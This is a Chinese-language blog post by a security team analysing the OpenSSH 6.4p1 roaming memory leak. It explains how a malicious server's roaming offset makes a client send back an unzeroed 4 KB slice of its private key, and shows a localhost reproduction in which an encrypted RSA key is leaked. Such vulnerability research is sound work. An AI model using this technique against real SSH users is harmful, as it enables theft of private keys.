Author:[email protected] Cloud Security Team

0x00 前言

---

想起以前寫了很多廣告序，估計也沒什麼人看。後來看到“天眼APT Team”和“360安服團隊”的人針對黑產只寫了句“人在做，天在看”，有點感悟。趕緊把sb型別的廣告刪掉，不能低估各位看客的智商。

安全本來就是攻防，沒什麼好講的，一群追逐影子的人，對於漏洞的驗證只是滿足獵奇心理罷了。

寫完後還要去樓下繼續圍觀 360 Unicorn Team在360網際網路訓練營上的超級精彩演講。

hf!

0x01 技術分析

---

不b話，上圖。

環境：

#!bash
系統版本：
Linux version 3.10.0-229.11.1.el7.x86_64 ([email protected]) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Thu Aug 6 01:06:18 UTC 2015

SSH版本：
OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013

以下結論為上述環境中實現

過程：

ssh建立連線時會讀入證書，其記憶體透過buffer.c檔案中的buffer_init()，buffer_free()函式管理

正常情況使用完畢會將記憶體內容清零

但若證書內容大於4k，ssh會呼叫realloc重新分配更多記憶體，此時不會將之前的記憶體清零，由此證書頭4k內容會殘留在記憶體中

接著，若惡意伺服器應答roaming，則協議好roaming id，cookie等以及一個服務端可控的偏移值 offset（實驗中我設定此值為 4096 – 663430，應客戶端預設傳送緩衝長度為663430）

同時響應一個<=4k的長度s_len，客戶端會分配一塊長度為s_len的“roaming_mem”，內容即為未清零的證書前4k殘留

此時惡意伺服器斷開連線，客戶端使用者可選擇恢復連線

則客戶端會將傳送偏移(ofs1)設定為服務端送過來的 offset 加本機預設傳送緩衝長度 663430

ofs2即是s_len長度4096

如此，客戶端會傳送roaming_mem + ofs1 – ofs2，長度 ofs2 的內容到服務端

此時ofs1-ofs2恰好等於0，也就相當於傳送roaming_mem為起始地址，ofs2=4096長度的內容，剛好就是證書4k殘留

實踐：

（證書內容本身不足4k，為方便實驗，手工在證書末尾新增了若干”\n”作為補位）

#!bash
[[email protected] openssh-6.4p1]$ ll /home/xxx/.ssh/id_rsa

-rw——- 1 xxx xxx 5169 Jan 16 11:58 /home/xxx/.ssh/id_rsa

[[email protected] openssh-6.4p1]$ strings /home/xxx/.ssh/id_rsa

—–BEGIN RSA PRIVATE KEY—–

Proc-Type: 4,ENCRYPTED

DEK-Info: AES-128-CBC,3C261314BCFFF0379DB2CE2E14F2CD42

45Tdi0y20+qovA5xbv957Ip8kwYqc48cjVcgSY4I7x/TDfUe9pziuGYJN1qPwfBJ

rh97z/yRPxGmMHxg+30cZ0tnGuRpKkCs/7fd2dSn19JxXS9+kxsZ2huVKgKigeyC

eu8Lb79Zmynhs1J/roqu2nlF6spCUD+dkmh8AldEw6eDYequv9iFSjVNMIcc9vXw

sh+7XfxJDS+A55X2yRJ6lOh10b+wxF/jf0fCaTsDtgHovoOUR/M6/TT56v5h/Nt5

G5p7Cjfe49OIw6jLzYua7/2DGM2F/9cbVy27h+OS+cJEhsLF+ajz5Go4nMYuhRY+

b6+v9KPy8mjeliXU3uwNGiO2jEztnX2m9EF43P58fVpky27pqVGK62Pm9vk24c2X

LxHTWw7eZipi7SNUNgsxKd8sxw26474DM0i6kiJNt9/OZxiVf3Sdu+R97+zeLBGI

R39QUfnsNNIO67DTqvskHbs6reTm4XQYpofZ9dzCAqgYbqNl0U4ZmY37p28Vu7GM

waHmT1c2jhpkZZBcRBsqskDywa7SfhR95Te1F+VR3XzxvW8xM4c4mhZ0oPV5ahFH

Dy1Odg9bd0TxufdjHPofulQjx2Ir9HhpAVasycyj6YEpe41COcxrTqU5uMjfLtoM

vQn0mGfRxb4gripQ0ImgSXWAhcRAlBCtrUuqadiLVIyRfJM4aEiuHlH2oKWjry0I

1i57M29VfmmNUf68R/AGTypMBVUx6FhV5xOeg4gnbDMIDHQ0e6VK/ZaFwU+xZozy

AHJIzbD27WADJZuj+izRrt+6uF1LgwlFyJkXUjDMUka/VNk3R+fkuB8kvf8ibJIP

gq0Ipn/I9rrymohGVjQjdbPYECy2QMqS3sjhKZsaGcOWNMG2bHO+1HsOJI5cUIZy

P7gOqtWO1V3bABHZJ9SK1yFj46S1dqbAic2We8dKUzRZIIx3hRPDDBp75IyLHnOI

EHkv0nYWg3CFPBaBZucfuEBPBdEUcZfYqWDgN4NNB+I6hUDKJgEi1psEKkmqqxEv

4GKVyhiIqBadZjIlhJc+bqd3za0p0xrk2DjVBR3bBepASkO4YKrzNzrF7TlMllFq

bhGrDsirw1fIP0NSDgREKdPFbRRshFdj9tRvWldq9QW9TFDPbJmzE7SC/56ggdvu

KhTNxTPaEZnck7INzJm/gYQiaZ/aeyJ+G5rNixWAKhRxHsqlWTWf+fySqoTMKClw

dj/pgZtt3oC5TdkO3DPC4/lyXSTa0uYGs1Alyr4FiOcyZ0CkE1ZQPyy1W1IKNlYW

Umvhw2F+y7x+uo/7TRz6ahOeQV9kF5pkEhm0zLE2yYVRzmf08i+rQ+OqjFH76bEb

6bGjd4TCVUIBXv6OpMm8vy/oB/QBxxNRlH5VnAcT+r/gu0tEFdroBkJ5RZEDMC6c

Vp5tZg+C7Cr2pfmoYBVnbIQ7CzlMvHpone9AFNnblL8Fcpwe/SSAcJP/p2TlFvg4

GCs3AYeWCOlRjroKOCjh0ikUcrXR85auPz6CG/hq3LVHyEZ1XfoLty4WOsTXwG5B

xE63YLQgG8oHHJFgtu2W5yHodfPIG1LOeBO5eaqpMj0qSGFdyLXPtT0Dnyc8CPo1

—–END RSA PRIVATE KEY—–

[[email protected] openssh-6.4p1]# /home/xxx/openssh-6.4p1/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key

[[email protected] openssh-6.4p1]$ ./ssh -p222 127.0.0.1

Enter passphrase for key ‘/home/xxx/.ssh/id_rsa':

[email protected] password:

[connection suspended, press return to resume][connection resumed]

[63]+  Stopped                 ./ssh -p222 127.0.0.1

[[email protected] openssh-6.4p1]$ sudo -i

[sudo] password for xxx:

[[email protected] ~]# strings /home/xxx/key

—–BEGIN RSA PRIVATE KEY—–

Proc-Type: 4,ENCRYPTED

DEK-Info: AES-128-CBC,3C261314BCFFF0379DB2CE2E14F2CD42

45Tdi0y20+qovA5xbv957Ip8kwYqc48cjVcgSY4I7x/TDfUe9pziuGYJN1qPwfBJ

rh97z/yRPxGmMHxg+30cZ0tnGuRpKkCs/7fd2dSn19JxXS9+kxsZ2huVKgKigeyC

eu8Lb79Zmynhs1J/roqu2nlF6spCUD+dkmh8AldEw6eDYequv9iFSjVNMIcc9vXw

sh+7XfxJDS+A55X2yRJ6lOh10b+wxF/jf0fCaTsDtgHovoOUR/M6/TT56v5h/Nt5

G5p7Cjfe49OIw6jLzYua7/2DGM2F/9cbVy27h+OS+cJEhsLF+ajz5Go4nMYuhRY+

b6+v9KPy8mjeliXU3uwNGiO2jEztnX2m9EF43P58fVpky27pqVGK62Pm9vk24c2X

LxHTWw7eZipi7SNUNgsxKd8sxw26474DM0i6kiJNt9/OZxiVf3Sdu+R97+zeLBGI

R39QUfnsNNIO67DTqvskHbs6reTm4XQYpofZ9dzCAqgYbqNl0U4ZmY37p28Vu7GM

waHmT1c2jhpkZZBcRBsqskDywa7SfhR95Te1F+VR3XzxvW8xM4c4mhZ0oPV5ahFH

Dy1Odg9bd0TxufdjHPofulQjx2Ir9HhpAVasycyj6YEpe41COcxrTqU5uMjfLtoM

vQn0mGfRxb4gripQ0ImgSXWAhcRAlBCtrUuqadiLVIyRfJM4aEiuHlH2oKWjry0I

1i57M29VfmmNUf68R/AGTypMBVUx6FhV5xOeg4gnbDMIDHQ0e6VK/ZaFwU+xZozy

AHJIzbD27WADJZuj+izRrt+6uF1LgwlFyJkXUjDMUka/VNk3R+fkuB8kvf8ibJIP

gq0Ipn/I9rrymohGVjQjdbPYECy2QMqS3sjhKZsaGcOWNMG2bHO+1HsOJI5cUIZy

P7gOqtWO1V3bABHZJ9SK1yFj46S1dqbAic2We8dKUzRZIIx3hRPDDBp75IyLHnOI

EHkv0nYWg3CFPBaBZucfuEBPBdEUcZfYqWDgN4NNB+I6hUDKJgEi1psEKkmqqxEv

4GKVyhiIqBadZjIlhJc+bqd3za0p0xrk2DjVBR3bBepASkO4YKrzNzrF7TlMllFq

bhGrDsirw1fIP0NSDgREKdPFbRRshFdj9tRvWldq9QW9TFDPbJmzE7SC/56ggdvu

KhTNxTPaEZnck7INzJm/gYQiaZ/aeyJ+G5rNixWAKhRxHsqlWTWf+fySqoTMKClw

dj/pgZtt3oC5TdkO3DPC4/lyXSTa0uYGs1Alyr4FiOcyZ0CkE1ZQPyy1W1IKNlYW

Umvhw2F+y7x+uo/7TRz6ahOeQV9kF5pkEhm0zLE2yYVRzmf08i+rQ+OqjFH76bEb

6bGjd4TCVUIBXv6OpMm8vy/oB/QBxxNRlH5VnAcT+r/gu0tEFdroBkJ5RZEDMC6c

Vp5tZg+C7Cr2pfmoYBVnbIQ7CzlMvHpone9AFNnblL8Fcpwe/SSAcJP/p2TlFvg4

GCs3AYeWCOlRjroKOCjh0ikUcrXR85auPz6CG/hq3LVHyEZ1XfoLty4WOsTXwG5B

xE63YLQgG8oHHJFgtu2W5yHodfPIG1LOeBO5eaqpMj0qSGFdyLXPtT0Dnyc8CPo1

—–END RSA PRIVATE KEY—–

[[email protected] ~]#  ll /home/xxx/key

-r——– 1 root root 4096 Jan 16 11:59 /home/xxx/key

0x02 寫在最後

---

唯一要說明的是現實世界裡pravite key檔案超過4k大小是一個並不常見的問題。引用Quake3裡的最感人的一句話作結尾。

gl, i love this game! (不知道有誰見到過這句話，見過的人你應該也是戰鬥過的人)。